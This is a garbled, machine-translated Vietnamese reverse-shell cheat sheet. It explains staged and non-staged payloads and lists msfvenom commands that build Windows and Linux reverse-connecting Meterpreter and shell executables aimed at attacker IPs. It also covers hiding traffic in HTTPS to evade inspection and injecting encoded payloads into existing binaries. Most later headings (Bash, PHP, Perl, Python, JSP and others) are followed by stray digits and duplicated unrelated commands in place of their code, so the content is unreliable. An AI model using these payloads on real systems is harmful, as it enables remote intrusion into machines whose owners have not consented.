Đây là bộ sưu tập tuyệt vời của các loại vỏ và web ngược khác nhau. Nhiều trong số những cái được liệt kê dưới đây đến từ trò lừa đảo này: //highon.coffee/blog/reverse-hell-cheat-heet/ //pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet Có một sự khác biệt quan trọng giữa tải trọng không dàn dựng và dàn dựng. Một vỏ không được giới hạn được gửi qua trong một khối. Bạn chỉ cần gửi vỏ trong một giai đoạn. Điều này có thể được bắt với Metasploit Multi-Handler. Mà còn với Netcat.non-staged shell is sent over in one block. You just send shell in one stage. This can be caught with metasploit multi-handler. But also with netcat. Vỏ được dàn dựng gửi chúng lần lượt. Điều này có thể hữu ích khi bạn có bộ đệm rất nhỏ cho shellcode của mình, vì vậy bạn cần chia tải trọng. Đồng hồ đo là một vỏ được dàn dựng. Đầu tiên, nó gửi một số phần của nó và thiết lập kết nối, và sau đó nó gửi thêm một số. Điều này có thể được bắt với Metasploit Multi-Handler nhưng không phải với Netcat. shells send them in turn.
This can be useful for when you have very small buffer for your shellcode, so you need to divide up the payload. Meterpreter is a staged shell. First it sends some parts of it and sets up the connection, and then it sends some more. This can be caught with metasploit multi-handler but not with netcat. Máy đo tiêu chuẩnReverse-shells
//highon.coffee/blog/reverse-shell-cheat-sheet/MSFVENOM
các cửa sổ
Đồng hồ đo
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=445 -f exe -o shell_reverse.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
Đồng hồ đo HTTPS
Nó làm cho đồng hồ giao thông trông bình thường. Vì nó được ẩn trong HTTPS, giao tiếp được mã hóa và có thể được sử dụng để bỏ qua các cuộc kiểm tra gói sâu.
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.101 LPORT=443 -f exe -o met_https_reverse.exe
Tải trọng không được dàn dựng
msfvenom -p windows/shell_reverse_tcp LHOST=196.168.0.101 LPORT=445 -f exe -o shell_reverse_tcp.exe
use exploit/multi/handler
set payload windows/shell_reverse_tcp
Tải trọng được dàn dựng
msfvenom -p windows/shell/reverse_tcp LHOST=196.168.0.101 LPORT=445 -f exe -o staged_reverse_tcp.exe
Điều này phải được bắt với metasploit. Nó không hoạt động với Netcat.
use exploit/multi/handler
set payload windows/shell/reverse_tcp
Tiêm tải trọng vào nhị phân
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=445 -f exe -e x86/shikata_ga_nai -i 9 -x "/somebinary.exe" -o bad_binary.exe
Linux
Nhị phân
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 -f elf > shell.elf
Bash
0&196
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
0PHP
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
1Netcat
Bind Shell
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
2Đảo ngược vỏ
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
3Với -e cờ
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
4use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
5Không có cờ
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
6Ncat
NCAT là một phiên bản tốt hơn và hiện đại hơn của Netcat. Một tính năng mà NetCat không có là mã hóa. Nếu bạn đang ở trên một pentestjob, bạn có thể không muốn giao tiếp không được mã hóa.
Trói buộc
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
7Telnet
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
8use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
9Perl
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.101 LPORT=443 -f exe -o met_https_reverse.exe
0Ruby
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.101 LPORT=443 -f exe -o met_https_reverse.exe
1Java
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.101 LPORT=443 -f exe -o met_https_reverse.exe
2Python
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.101 LPORT=443 -f exe -o met_https_reverse.exe
3Shells Web - Nền tảng độc lập
PHP
Bóng PHP này là độc lập với hệ điều hành. Bạn có thể sử dụng nó trên cả Linux và Windows.
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.101 LPORT=443 -f exe -o met_https_reverse.exe
4Asp
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.101 LPORT=443 -f exe -o met_https_reverse.exe
5CHIẾN TRANH
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.101 LPORT=443 -f exe -o met_https_reverse.exe
6JSP
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.101 LPORT=443 -f exe -o met_https_reverse.exe
7